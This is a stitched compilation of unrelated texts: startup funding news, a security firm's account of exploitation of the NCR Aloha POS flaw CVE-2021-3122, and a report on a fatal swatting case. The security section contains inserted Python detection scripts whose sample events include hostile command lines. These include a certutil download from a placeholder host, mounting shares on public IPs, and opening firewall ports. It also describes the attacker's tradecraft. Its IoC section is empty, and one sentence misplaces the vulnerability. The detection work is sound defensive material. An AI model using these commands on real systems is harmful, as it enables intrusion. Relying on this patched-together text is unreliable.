Payments company Paystone raises $23.8M to help service-based businesses engage with customers

Paystone, a payments and integrated software company, secured another strategic investment this year, this time $23.8 million ($30 million CAD) from Crédit Mutuel Equity, the private equity arm of Crédit Mutuel Alliance Fédérale.

The Canada-based company got its start in 2008 as the payment processing company Zomaron, and rebranded itself as Paystone in 2019. Today it provides electronic payments and customer engagement technology to businesses, particularly those that provide services, CEO Tarique Al-Ansari told TechCrunch.

“Paystone is on a mission to help businesses grow, and we were enthralled by their commitment to that mission and their focus on service-oriented verticals,” said Léa Perge, investor at Crédit Mutuel Equity in Canada, via email.

While most of the company’s peers focus on product companies, Al-Ansari saw how underserved the service side was: service businesses have different needs and, unlike retailers, aren’t looking to sell online. Rather, they need an online presence and digital marketing to engage with customers, with a focus on being findable and having content that tells people why they should do business with them.

Paystone provides the marketing through content, help with reviews and with loyalty and rewards programs. However, rather than reward for spending, Paystone rewards for behavior. Refer a friend, get a reward. Write a review, get a reward. Al-Ansari calls it “payments as a benefit.” Referrals and reviews are how businesses become more findable, and the more content that’s out there, the more it helps people consider the business trustworthy, he added.

The new funding gives Canada-based Paystone total funds raised in 2021 of $78.8 million in a mix of debt and equity. It raised $54.9 million in January, funds that were barely touched as of yet, Al-Ansari said.

Though he wasn’t actively seeking new funds, Al-Ansari had been speaking with Crédit Mutuel Equity, which used to be CIC Capital Canada, prior to the pandemic, and their deal was put on hold.

Crédit Mutuel Equity came back with similar interest, and taking into account the kind of talent Paystone wanted to go after and its acquisition strategy — the company has already acquired five companies — Al-Ansari decided to take the additional funds. He said it gives the company options to hire more and double down on building the company, as well as enough capital to look for more acquisitions.

This year, Paystone entered the U.S. market for the first time and will do a proper launch later this year. The company has over 30,000 merchant locations on its platform throughout North America, and Al-Ansari expects that to grow by 5,000 this year. The company has 150 employees currently, and another 50 are expected to come on board by the end of the year.

In addition, Al-Ansari expects growth to accelerate for the rest of the year. The company processes around $6 billion in credit card payments and is on track to bring in $55.7 million in revenue this year. It is cash flow positive, a holdover from the company’s bootstrapped origins, he said.

“We want to become the go-to destination for service businesses to set up a digital presence to accept payments and provide loyalty and rewards,” Al-Ansari said. “We will do this by solidifying our market position and growing our platform with the tools that customers want.”

 

CVE-2021-3122 | How We Caught a Threat Actor Exploiting NCR POS Zero Day

A guest post by Kyle Pagelow from Tetra Defense

In this post, we describe how our Incident Response team discovered and thwarted a threat actor stealing credit card data by exploiting a zero day RCE (remote code execution) vulnerability in NCR’s Aloha Point of Sale software, widely used in the catering and restaurant industries.

Our investigation led us to discover and report CVE-2021-3122. While Tetra Defense successfully defended the client’s business, removing the threat actor’s access from the client’s network and mitigating the entire infection chain, a large number of other potential victims are readily discoverable, many of whom could be actively exploited today.

According to the vendor, CVE-2021-3122 is a client misconfiguration, and it appears that it is up to each client using Aloha POS to ensure that the server is properly configured and cannot be exploited in the way described in this post.

While we acknowledge NCR’s position, it is also worth pointing out that this “misconfiguration” is widely deployed and known to be actively exploited. Therefore, we urge all NCR Aloha POS users to ensure their Aloha POS configuration follows NCR’s guidelines and to confirm that their POS network has not been compromised in the manner we discuss in detail below.

Point of Ingress | The Threat Actor’s Initial Compromise

NCR’s Aloha POS software is an end to end point of sale system application primarily used by restaurants to take orders, accept credit card payments and manage other sensitive business functions. As is standard practice, our client was running Aloha POS on an isolated private network, with a number of terminals utilizing this network. The only outward bound communication from any endpoint on the network was to the Aloha Back of House (BOH) server.

The Aloha BOH server provides administrative functions for each of the POS terminals and is responsible for all external communications. Primarily, external traffic consists of communication between the BOH server and NCR’s own servers for the purpose of receiving various administrative commands, performing maintenance and updating the POS terminals when required.

Prior to our IR investigation team being brought in, the client’s network appears to have first been compromised in February 2017. BlackPOS, rtPOS, GratefulPOS and PWNPOS were observed on the client’s systems, along with BTCamant ransomware, shortly after the client had installed an MSP provider. While some of the malware infections avoided C2 communications and wrote files out locally to disk, by December 2018 RampagePOS was observed communicating with a C2 at support[.]nesinoder[.]com. This domain was later seen to be associated with Maze ransomware.

In September 2019, the threat actor began utilizing a commercial remote monitoring and management tool (RMM) called screenconnect. The threat actors configured the RMM tool to report to their own C2s and cleverly disguised the DNS to blend in with legitimate traffic to NCR by using the address support-ncr-aloha[.]net.

The threat actor’s next step was to begin installing credit card stealing malware on both the BOH server and terminal endpoints on January 9th, 2020. At this time, malware was pushed to the terminals using a batch script to update the hosts file on each terminal with an entry labelled ‘back’ and the IP address of the BOH server. Since the terminals had no ability to communicate externally, the malware was configured to send encrypted, scraped credit card data to the BOH server over port 1888.

Discovering the BOH RCE Attack Vector

While it’s not surprising that the terminals could have their hosts files manipulated by the BOH server, the attack’s real menace comes from the exploitation of an hitherto unknown vulnerability in the support[.]ncr-aloha[.]net running on the BOH server. While NCR has been at pains to point out that the exploit requires an unsupported configuration, our investigation found that there are hundreds of Aloha BOH servers currently configured in this way and, therefore, vulnerable to attack.

As attack methods, motives, and consequences change daily, our IR investigation team uses SentinelOne Singularity as our constant ongoing endpoint protection and alert method. We deployed SentinelOne on the client’s terminals and BOH servers as part of our emergency incident response effort. This allowed us not only to get full visibility into the threat actor’s TTPs but also alerts at each stage of the ongoing infection. Via the SentinelOne agents and management console, we were able to identify connections from external IP addresses to the Aloha Command Center Agent occurring over port 8089.
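The network conditions described so far (external hosts reaching the Command Center Agent on port 8089, terminals sending data to the BOH server on port 1888, and terminals that should talk to nothing but the BOH server) can be checked against flow logs. The following is an added example, not code from Tetra Defense or NCR; the log layout, the addresses and the RFC 1918 internal ranges are assumptions, and the sample records are constructed.

```python
import ipaddress
from typing import NamedTuple

AGENT_PORT = 8089  # Command Center Agent port named in the article
EXFIL_PORT = 1888  # port the card scraper used from terminals to the BOH server

# Assumption: everything outside RFC 1918 space counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumed addressing for the constructed sample below.
BOH_SERVER = ipaddress.ip_address("10.20.0.5")
TERMINALS = ipaddress.ip_network("10.20.1.0/24")

# Constructed flow records: time, source IP, source port, dest IP, dest port.
SAMPLE_FLOWS = """\
2021-03-01T03:12:44Z 10.20.1.11 49722 10.20.0.5 1888
2021-03-01T03:13:02Z 203.0.113.45 51514 10.20.0.5 8089
2021-03-01T03:13:40Z 10.20.0.9 50110 10.20.0.5 8089
2021-03-01T03:14:05Z 10.20.1.12 49801 198.51.100.7 443
2021-03-01T03:14:30Z 10.20.1.11 49730 10.20.0.5 445
this line is truncated
"""


class Flow(NamedTuple):
    ts: str
    src: object
    sport: int
    dst: object
    dport: int


def parse_flows(text):
    """Return (flows, skipped); malformed lines are counted, not fatal."""
    flows, skipped = [], 0
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        try:
            ts, src, sport, dst, dport = parts
            flows.append(Flow(ts, ipaddress.ip_address(src), int(sport),
                              ipaddress.ip_address(dst), int(dport)))
        except ValueError:  # wrong field count, bad IP or bad port
            skipped += 1
    return flows, skipped


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def classify(flow):
    """Return a finding label for a flow, or None if it fits the baseline."""
    to_boh = flow.dst == BOH_SERVER
    # An external address reaching the agent port on the BOH server.
    if to_boh and flow.dport == AGENT_PORT and not is_internal(flow.src):
        return "external-to-agent-port"
    if flow.src in TERMINALS:
        # Terminal pushing data to the BOH server on the scraper's port.
        if to_boh and flow.dport == EXFIL_PORT:
            return "terminal-to-boh-1888"
        # Terminals are only expected to talk to the BOH server.
        if not to_boh:
            return "terminal-off-baseline"
    return None


def scan(text):
    """Return ([(timestamp, label), ...], skipped_line_count)."""
    flows, skipped = parse_flows(text)
    findings = []
    for flow in flows:
        label = classify(flow)
        if label:
            findings.append((flow.ts, label))
    return findings, skipped


if __name__ == "__main__":
    results, bad = scan(SAMPLE_FLOWS)
    for ts, label in results:
        print(ts, label)
    print("unparsed lines:", bad)
```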


Having rebuilt the entire Aloha POS network, now with SentinelOne installed, we were able to observe how the actor then re-compromised the system. It quickly became apparent that the threat actor was able to connect to the cmcAgent.exe externally and run commands with SYSTEM level privileges.

The SentinelOne agent alerted us as the threat actor dropped an instance of the DoublePulsar backdoor on the BOH server and wrote malware to the screenconnect directory in c:\windows\temp. The threat actor used the Eternal Champion exploit from FUZZBUNCH to install the malware.

In addition, we observed the threat actor utilizing other LOLBins such as certutil to download files, the net command to mount shares to public IP addresses, and netsh to open ports on the Windows firewall and expose services such as RDP.

We leveraged the management console’s Deep Visibility feature and found that the malware was using msiexec for the screenconnect MSI to reach out to the attacker’s C2 at support[.]ncr-aloha[.]net.

At this point, we leveraged the SentinelOne remote shell feature to kill off screenconnect and quarantine the cmcAgent.exe. We ran further Deep Visibility queries to prevent the threat actor from further exploitation of the network.
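The behaviours reported in this section (commands run through cmcAgent.exe, certutil downloads, the net command mounting shares on public IP addresses, netsh opening firewall ports) map onto simple process-creation rules. This is an added example, not from the original post or any vendor product; the event fields, rule names and placeholder install path are assumptions, and the events are constructed.

```python
import ipaddress
import re

# Assumption: RFC 1918 space is internal, anything else is public.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SHELLS = {"cmd.exe", "powershell.exe"}
UNC_HOST = re.compile(r"\\\\([0-9]{1,3}(?:\.[0-9]{1,3}){3})\\")
URL = re.compile(r"https?://", re.I)

# Constructed process-creation events: (parent image, image, command line).
SAMPLE_EVENTS = [
    (r"C:\PLACEHOLDER\cmcAgent.exe", r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c whoami"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -f http://files.example/u.bin u.bin"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     "certutil.exe -hashfile report.pdf SHA256"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
     r"net use Z: \\198.51.100.7\share"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
     r"net use Y: \\10.20.0.5\aloha"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\netsh.exe",
     'netsh advfirewall firewall add rule name="rdp" dir=in action=allow '
     "protocol=TCP localport=3389"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\netsh.exe",
     "netsh advfirewall firewall show rule name=all"),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_public(ip_text):
    """True for a valid address outside loopback and RFC 1918 space."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:  # e.g. an octet above 255
        return False
    return not (ip.is_loopback or any(ip in net for net in RFC1918))


def detect(parent, image, cmdline):
    """Return the list of rule names that an event triggers."""
    parent, image, low = basename(parent), basename(image), cmdline.lower()
    hits = []
    # The agent itself launching an interactive shell or interpreter.
    if parent == "cmcagent.exe" and image in SHELLS:
        hits.append("agent-spawned-shell")
    # certutil given a URL is fetching content, not managing certificates.
    if image == "certutil.exe" and URL.search(cmdline):
        hits.append("certutil-download")
    # net use against a UNC host that is a public IP address.
    if image in ("net.exe", "net1.exe") and re.search(r"\buse\b", low):
        if any(is_public(host) for host in UNC_HOST.findall(cmdline)):
            hits.append("net-use-public-ip")
    # netsh adding a firewall rule or port opening.
    if image == "netsh.exe" and "firewall" in low and re.search(r"\badd\b", low):
        hits.append("netsh-firewall-add")
    return hits


def scan(events):
    """Return [(event index, [rule names])] for events with at least one hit."""
    results = []
    for index, event in enumerate(events):
        hits = detect(*event)
        if hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index][2], "->", ", ".join(hits))
```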

Discovering CVE-2021-3122 and Creating a POC Exploit

Having secured the client’s network, our next task was to understand what vulnerability the threat actor was leveraging to access the Aloha BOH server. Our investigation found that a flaw exists within the NCR Command Center Agent (cmcAgent.exe). Systems that are configured with an internet-facing Command Center Agent display a banner with the hostname of the server and are discoverable through network scanning and banner grabbing. Simple searches can also be conducted through the use of tools such as shodan.io.

The cmcAgent’s RUNCommand function allows for a parameter to be supplied in a specially crafted XML request that can be executed remotely if the server is configured to listen on TCP port 8089 for incoming connections. Passing such a command allows the attacker to execute that command as SYSTEM.

In our POC, we executed a custom command remotely against a virtual machine that had the cmcAgent running. We created several requests and executed cmd.exe, powershell.exe and calc.exe. All processes spawned under the ‘SYSTEM’ user and were running in the background.

Additionally, when connecting to the port, the server will return a response with the hostname of the system as well as other information indicating the system is running Aloha software. This means it is a simple matter to conduct a shodan search for the banner and see which NCR customers have the Command Center Agent publicly exposed.

Responsible Disclosure and Vendor Response

In June of 2020, Tetra contacted the vendor NCR, creators of the Aloha platform, in order to responsibly disclose the vulnerability. NCR indicated that the vulnerability is only exploitable if customers are misconfigured and have the CMCagent’s listening port exposed. NCR updated their documentation for the CMCAgent and added a requirement not to have the CMCAgent internet-facing. Tetra contacted CISA and disclosed the vulnerability in December of 2020. MITRE rated the vulnerability with a CVSS score of 9.8.

Recommendations and Mitigation

NCR customers are urged to ensure they have updated to the latest available version.

Users running the Aloha POS system in their environment are strongly urged to review their system configuration and prohibit unauthorized hosts from connecting to vulnerable systems.

Users should run an up-to-date security solution such as SentinelOne Singularity across their environment and review security alerts.

Indicators of Compromise



Tailor Brands raises $50M, aims to be one-stop shop for small businesses to launch

Tailor Brands, a startup that automates parts of the branding and marketing process for small businesses, announced Thursday it has raised $50 million in Series C funding.

GoDaddy led the round as a strategic partner and was joined by OurCrowd and existing investors Pitango Growth, Mangrove Capital Partners, Armat Group, Disruptive VC and Whip Media founder Richard Rosenblatt. Tailor Brands has now raised a total of $70 million since its inception in 2015.

“GoDaddy is empowering everyday entrepreneurs around the world by providing all of the help and tools to succeed online,” said Andrew Morbitzer, vice president of corporate development at GoDaddy, in a written statement. “We are excited to invest in Tailor Brands — and its team — as we believe in their vision. Their platform truly helps entrepreneurs start their business quickly and easily with AI-powered logo design and branding services.”

When Tailor Brands, which launched at TechCrunch’s Startup Battlefield in 2014, raised its last round, a $15.5 million Series B, in 2018, the company was focused on AI-driven logo creation.

The company, headquartered in New York and Tel Aviv, is now compiling the components for a one-stop SaaS platform — providing the design, branding and marketing services a small business owner needs to launch and scale operations, and within minutes, Yali Saar, co-founder and CEO of Tailor Brands told TechCrunch.

Over the past year, more users are flocking to Tailor Brands; the company is onboarding some 700,000 new users per month for help in the earliest stages of setting up their business. In fact, the company saw a 27% increase in new business incorporations as the creator and gig economy gained traction in 2020, Saar said.

In addition to the scores of new users, the company crossed 30 million businesses using the platform. At the end of 2019, Tailor Brands started monetizing its offerings and “grew at a staggering rate,” Saar added. The company yielded triple-digit annual growth in revenue.

To support that growth, the new funding will be used on R&D, to double the team and create additional capabilities and functions. There may also be future acquisition opportunities on the table.

Saar said Tailor Brands is at a point where it can begin leveraging the massive amount of data on small businesses it gathers to help them be proactive rather than reactive, turning the platform into a “consultant of sorts” to guide customers through the next steps of their businesses.

“Users are looking for us to provide them with everything, so we are starting to incorporate more products with the goal of creating an ecosystem, like WeChat, where you don’t need to leave the platform at all to manage your business,” Saar said.

 

Sendlane raises $20M to convert shoppers into loyal customers

Sendlane, a San Diego-based multichannel marketing automation platform, announced Thursday it raised $20 million in Series A funding.

Five Elms Capital and others invested in the round to give Sendlane total funding of $23 million since the company was founded in 2018.

Though the company officially started three years ago, co-founder and CEO Jimmy Kim told TechCrunch he began working on the idea back in 2013 with two other co-founders.

They were all email marketers in different lines of business, but had some common ground in that they were all using email tools they didn’t like. The ones they did like came with too big of a price tag for a small business, Kim said. They set out to build their own email marketing automation platform for customers that wanted to do more than email campaigns and newsletters.

When two other companies Kim was involved in exited in 2017, he decided to put both feet into Sendlane to build it into a system that maximized revenue based on insights and integrations.

In late 2018, the company attracted seed funding from Zing Capital and decided in 2019 to pivot into e-commerce. “Based on our personal backgrounds and looking at the customers we worked with, we realized that is what we did best,” Kim said.

Today, more than 1,700 e-commerce companies use Sendlane’s platform to convert more than 100 points of their customers’ data — abandoned carts, which products sell the best and which marketing channel is working — into engaging communications aimed at driving customer loyalty. The company said it can increase revenue for customers between 20% and 40% on average.

The company itself is growing 100% year over year and seeing over $7 million in annual recurring revenue. It currently has 54 employees, and Kim expects to be at around 90 by the end of the year and 150 by the end of 2022. Sendlane has more than 20 open roles, he said.

That current and potential growth was a driver for Kim to go after the Series A funding. He said Sendlane became profitable last year, which is why it has not raised a lot of money so far. However, as the rapid adoption of e-commerce continues, Kim wants to be ready for the next wave of competition coming in, which he expects in the next year.

He considers companies like ActiveCampaign and Klaviyo to be in line with Sendlane, but says his company’s differentiator is customer service, boasting short wait times and chats that answer questions in less than 15 seconds.

He is also ready to go after the next vision, which is to unify data and insights to create meaningful interactions between customers and retailers.

“We want to start carving out a new space,” Kim added. “We have a ton of new products coming out in the next 12 to 18 months and want to be the single source for customer journey data insights that provides flexibility for your business to grow.”

Two upcoming tools include Audiences, which will unify customer data and provide insights, and an SMS product for two-way communications and enabled campaign-level sending.

 

Ethos picks up $100M at a $2.7B+ valuation for a big data platform to improve life insurance accessibility

More than half of the U.S. population has stayed away from considering life insurance because they believe it’s probably too expensive, and the most common way to buy it today is in person. A startup that’s built a platform that aims to break down those conventions and democratize the process by making life insurance (and the benefits of it) more accessible is today announcing significant funding to fuel its rapidly growing business.

Ethos, which uses more than 300,000 data points online to determine a person’s eligibility for life insurance policies, which are offered as either term or whole life packages starting at $8/month, has picked up $100 million from a single investor, SoftBank Vision Fund 2. Peter Colis, Ethos’s CEO and co-founder, said that the funding brings the startup’s valuation to over $2.7 billion.

This is a quick jump for the company: It was only two months ago that Ethos picked up a $200 million equity round at a valuation of just over $2 billion.

It has now raised $400 million to date and has amassed a very illustrious group of backers. In addition to SoftBank they include General Catalyst, Sequoia Capital, Accel, GV, Jay-Z’s Roc Nation, Glade Brook Capital Partners, Will Smith and Robert Downey Jr.

This latest injection of funding — which will be used to hire more people and continue to expand its product set into adjacent areas of insurance like critical illness coverage — was unsolicited, Colis said, but comes on the heels of very rapid growth.

Ethos — which is sold currently only in the U.S. across 49 states — has seen both revenues and user numbers grow by over 500% compared to a year ago, and it’s on track to issue some $20 billion in life insurance coverage this year. And it is approaching $100 million in annualized growth profit. Ethos itself is not yet profitable, Colis said.

There are a couple of trends going on that speak to a wide opportunity for Ethos at the moment.

The first of these is the current market climate: Globally we are still battling the COVID-19 global health pandemic, and one impact of that — in particular given how COVID-19 has not spared any age group or demographic — has been more awareness of our mortality. That inevitably leads at least some part of the population to considering something like life insurance coverage that might not have thought about it previously.

However, Colis is a little skeptical on the lasting impact of that particular trend. “We saw an initial surge of demand in the COVID period, but then it regressed back to normal,” he said in an interview. Those who were more inclined to think about life insurance around COVID-19 might have come around to considering it regardless: It was being driven, he said, by those with pre-existing health conditions going into the pandemic.

That, interestingly, brings up the second trend, which goes beyond our present circumstances, and Colis believes will have the more lasting impact.

While there have been a number of startups, and even incumbent providers, looking to rethink other areas of insurance such as car, health and property coverage, life insurance has been relatively untouched, especially in some markets like the U.S. Traditionally, someone taking out life insurance goes through a long vetting process, which is not all carried out online and can involve medical examinations and more, and yes, it can be expensive: The stereotype you might best know is that only wealthier people take out life insurance policies.

Much like fintech companies that have rethought how loan applications (and payback terms) can be evaluated using big data — pulling in a new range of information to form a picture of the applicant and the likelihood of default or not — Ethos is among the companies applying that same concept to a different problem. The end result is a much faster turnaround for applications, a considerably cheaper and more flexible offer (term life insurance lasts only as long as a person pays for it), and generally a lot more accessibility for everyone potentially interested. That pool of data is growing all the time.

“Every month, we get more intelligent,” said Colis.

There is also the matter of what Ethos is actually selling. The company itself is not an insurance provider but an “insuretech” — similar to how neobanks use APIs to integrate banking services that have been built by others, which they then wrap with their own customer service, personalization and more — Ethos integrates with third-party insurance underwriters, providing customer service, more efficient onboarding (no in-person medical exams for example) and personalization (both in packages and pricing) around them. Given how staid and hard it is to get more traditional policies, it’s essentially meant completely open water for Ethos in terms of finding and securing new customers.

Ethos’s rise comes at a time when we are seeing other startups approaching and rethinking life insurance also in the U.S. and further afield. Last week, YuLife in the U.K. raised a big round to further build out its own take on life insurance, which is to sell policies that are linked to an individual’s own health and wellness practices — the idea being that this will make you happier and give more reason to pay for a policy that otherwise feels like some dormant investment; but also that it could help you live longer (Sproutt is another also looking at how to emphasize the “life” aspect of life insurance). Others like DeadHappy and BIMA are, like Ethos, rethinking accessibility of life insurance for a wider set of demographics.

There are some signs that Ethos is catching on with its mission to expand that pool, not just grow business among the kind of users who might have already been considering and would have taken out life insurance policies. The startup said that more than 40% of its new policy holders in the first half of 2021 had incomes of $60,000 or less, and nearly 40% of new policy holders were under the age of 40. The professions of those customers also speak to that democratization: The top five occupations, it said, were homemaker, insurance agent, business owner, teacher and registered nurse.

That traction is likely one reason why SoftBank came knocking.

“Ethos is leveraging data and its vertically integrated tech stack to fundamentally transform life insurance in the U.S.,” said Munish Varma, managing partner at SoftBank Investment Advisers, in a statement. “Through a fast and user-friendly online application process, the company can accurately underwrite and insure a broad segment of customers quickly. We are excited to partner with Peter Colis and the exceptional team at Ethos.”

Andreessen Horowitz funds Vitally’s $9M round for customer experience software

Customer success company Vitally raised $9 million in Series A funding from Andreessen Horowitz to continue developing its SaaS platform automating customer experiences.

Co-founder and CEO Jamie Davidson got the idea for Vitally while he was at his previous company, Pathgather. As chief customer officer, he was looking at tools and “was underwhelmed” by the available tools to automate repetitive tasks. So he set out to build one.

The global pandemic thrust customer satisfaction into the limelight as brands realized that the same ways they were engaging with customers had to change now that everyone was making the majority of their purchases online. Previously, a customer service representative may have managed a dozen accounts, but nowadays with product-led growth, they tackle a portfolio of thousands of customers, Davidson told TechCrunch.

New York-based Vitally, founded in 2017, unifies all of that customer data into one place and flows it through an engine to provide engagement insights, like what help customers need, which ones are at risk of churning and which to target for expanded revenue opportunities. Its software also provides automation to balance workflow and steer customer success teams to the tasks with the right customers so that they are engaging at the correct time.

Andreessen approached Davidson for the Series A, and he liked the alignment in customer success vision, he said. Including the new funding, Vitally raised a total of $10.6 million, which includes $1.2 million in September 2019.

From the beginning, Vitally was bringing in strong revenue growth, which enabled the company to focus on building its platform and hold off on fundraising.

“A Series A was certainly on our mind and road map, but we weren’t actively fundraising,” Davidson said. “However, we saw a great fit and great backing to help us grow. Tools have lagged in the customer success area and how to manage that. Andreessen can help us scale and grow with our customers as they manage the thousands of their customers.”

Davidson intends to use the new funding to scale Vitally’s team across the board and build out its marketing efforts to introduce the company to the market. He expects to grow to 30 by the end of the year to support the company’s annual revenue growth — averaging 3x — and customer acquisition. Vitally is already working with big customers like Segment, Productboard and Calendly.

As part of the investment, Andreessen general partner David Ulevitch is joining the Vitally board. He saw an opportunity for the reimagining of how SaaS companies delivered customer success, he told TechCrunch via email.

Similar to Davidson, he thought that customer success teams were now instrumental to growing SaaS businesses, but technology lagged behind market need, especially with so many SaaS companies taking a self-serve or product-led approach that attracted more orders than legacy tools.

Before the firm met Vitally, it was hearing “rave reviews” from its customers, Ulevitch said.

“The feedback was overwhelmingly positive and affirmed the fact that Vitally simply had the best product on the market since it actually mapped to how businesses operated and interacted with customers, particularly businesses with a long-tail of paying customers,” he added. “The first dollar into a SaaS company is great, but it’s the renewal and expansion dollars that really set the winners apart from everyone else. Vitally is in the best position to help companies get that renewal, help their customers expand accounts and ultimately win the space.”

 

Yoobic raises $50M for its chat and communications app aimed at frontline and service workers

Slack set the standard in many ways for what knowledge workers want and expect out of a workplace collaboration app these days, but a lot has been left on the table when it comes to frontline workers. Today, one of the software companies that has built a popular app for that frontline crowd to become a part of the conversation is announcing a funding round that speaks to the opportunity to do more.

Yoobic, which provides an app for frontline and service workers to manage tasks, communicate with each other and management, and also go through training, development and other e-learning tasks, has picked up $50 million.

Highland Europe led the round, a Series C, with previous investors Felix Capital, Insight Partners, and a family office advised by BNF Capital Limited also participating. (Felix led Yoobic’s Series A, while Insight Partners led the Series B in 2019.) Yoobic is not discussing valuation but from what I understand from a reliable source, it is now between $300 million and $400 million.

The funding comes at a time of strong growth for the company.

Yoobic works with some 300 big brands in 80 countries altogether covering a mammoth 335,000 locations in sectors like retail, hospitality, distribution and manufacturing. Its customers include the likes of the Boots pharmacy chain, Carrefour supermarkets, Lancôme, Lacoste, Logitech, Lidl, Peloton, Puma, Vans, VF Corp, Sanofi, Untuckit, Roots, Canada Goose, Longchamp, Lidl, Zadig & Voltaire, and Athletico.

But that is just the tip of the iceberg. It’s estimated that there are 2.7 billion “deskless” (frontline and service) workers globally, accounting for no less than 80% of the world’s workforce. But here is the shocker: only 1% of IT budgets is currently spent on them. That speaks of huge opportunity for startups to build more here, but only if they (or the workers themselves) can manage to convince those holding the purse strings that it’s worth the investment.

So to that end, the funding will be used to hire more talent, to expand geographically — founded in London, the company is now headquartered in New York — and to expand its product. Specifically, Yoobic plans to build more predictive analytics to improve responsiveness and give more insight to companies about their usage, and to build out more tools to cater to specific verticals in the world of frontline work, such as manufacturing, logistics and transportation, Fabrice Haiat, CEO and co-founder of YOOBIC, told TechCrunch in an interview.

Yoobic started life several years ago with a focus specifically on retail — an area that it was concentrating on as recently as its last round in 2019, providing tools to help with merchandizing, communicating about stock between stores and more. While retail is still a sizeable part of its business, Yoobic saw an opening to expand into a wider pool of verticals with frontline and service employees that had many of the same demands as retail.

That turned out to be a fortunate pivot as the pandemic struck.

“Covid-19 had a big impact on us,” said Haiat, who co-founded the company with brothers Avi and Gilles. “The first two months we were in panic mode. But what happened was that businesses realized that frontline employees were critical to the success of their operations.”

Since Covid hit last year, he said that activity on the platform rose by 200%, and earlier this year it passed 1 million activities per month on its platform. “We are growing like crazy,” Haiat said.

There are a number of reasons why building for frontline workers is important. Roaming around without a fixed desk, spending more time with customers than looking at a screen or in meetings, and generally having different business priorities and practices are just a few of the reasons why software built for desk-based knowledge workers doesn’t necessarily work for frontline workers.

There have been a number of companies that have aimed to build services to address that gap — they stretch back years, in fact. And there have been some interesting moves to consolidate in the market among those building some of the more successful tools for people in the field: Crew recently got acquired by Square; ServiceMax acquired Zinc; and Facebook’s Workplace has been on a march to amass some of the world’s biggest companies as customers of its own communications platform with a strong play for frontline workers.

Haiat argues that while all of these are fine and well, none of them understand the full scope of the kinds of tools that those in the field really need. That ranges from practical features (such as a way to handle inventory management), through to features that companies would love to have for their employees as long as they can be delivered in an easy way (such as professional development and training). In that context, the basic communications that all of the current crop of apps for frontline workers offer feel like basic table stakes.

That close understanding of the gap in the market and what is needed to fix it is one reason why the company has seen such strong growth, as well as interest from investors.

“We’re excited to partner with YOOBIC, which, thanks to the highly impressive team led by Fabrice, Avi and Gilles, has clearly established itself as a leader in the digital workplace space with demonstrable market traction and impressive growth,” said Jean Tardy-Joubert, partner at Highland Europe, in a statement. “While companies have historically focused on digital investments for deskbound employees, the world is becoming distributed and decentralized. We anticipate a seismic shift that will see huge resources, technology, and capital shifted toward frontline teams.” Tardy-Joubert will be joining the YOOBIC Board with this round.

Serial Swatter Who Caused Death Gets Five Years in Prison

An 18-year-old Tennessee man who helped set in motion a fraudulent distress call to police that led to the death of a 60-year-old grandfather in 2020 was sentenced to 60 months in prison today.

60-year-old Mark Herring died of a heart attack after police surrounded his home in response to a swatting attack.

Shane Sonderman, of Lauderdale County, Tenn., admitted to conspiring with a group of criminals that’s been “swatting” and harassing people for months in a bid to coerce targets into giving up their valuable Twitter and Instagram usernames.

At Sonderman’s sentencing hearing today, prosecutors told the court the defendant and his co-conspirators would text and call targets and their families, posting their personal information online and sending them pizzas and other deliveries of food as a harassment technique.

Other victims of the group told prosecutors their tormentors further harassed them by making false reports of child abuse to social services local to the target’s area, and false reports in the target’s name to local suicide prevention hotlines.

Eventually, when subjects of their harassment refused to sell or give up their Twitter and Instagram usernames, Sonderman and others would swat their targets — or make a false report to authorities in the target’s name with the intention of sending a heavily armed police response to that person’s address.

For weeks throughout March and April 2020, 60-year-old Mark Herring of Bethpage, Tenn., was inundated with text messages asking him to give up his @Tennessee Twitter handle. When he ignored the requests, Sonderman and his buddies began having food delivered to Herring’s home via cash on delivery.

At one point, Sonderman posted Herring’s home address in a Discord chat room used by the group, and a minor in the United Kingdom quickly followed up by directing a swatting attack on Herring’s home.

Ann Billings was dating Mr. Herring and was present when the police surrounded his home. She recalled for the Tennessee court today how her friend died shortly thereafter of a heart attack.

Billings said she first learned of the swatting when a neighbor called and asked why the street was lined with police cars. When Mr. Herring stepped out on the back porch to investigate, police told him to put his hands up and to come to the street.

Unable to disengage a lock on his back fence, Herring was instructed to somehow climb over the fence with his hands up.

“He was starting to get more upset,” Billings recalled. “He said, ‘I’m a 60-year-old fat man and I can’t do that.’”

Billings said Mr. Herring then offered to crawl under a gap in the fence, but when he did so and stood up, he collapsed of a heart attack. Herring died at a nearby hospital soon after.

Mary Frances Herring, who was married to Mr. Herring for 28 years, said her late husband was something of a computer whiz in his early years who secured the @Tennessee Twitter handle shortly after Twitter came online. Internet archivist Jason Scott says Herring was the creator of the successful software products Sparkware and QWIKMail; Scott has 2 hours’ worth of interviews with Herring from 20 years ago.

Perhaps the most poignant testimony today came when Ms. Herring said her husband — who was killed by people who wanted to steal his account — had a habit of registering new Instagram usernames as presents for friends and family members who’d just had children.

“If someone was having a baby, he would ask them, ‘What are you naming the baby?’,” Ms. Herring said. “And he would get them that Instagram name and give it to them as a gift.”

Valerie Dozono also was an early adopter of Instagram, securing the two-letter username “VD” for her initials. When Dozono ignored multiple unsolicited offers to buy the account, she and many family and friends started getting unrequested pizza deliveries at all hours.

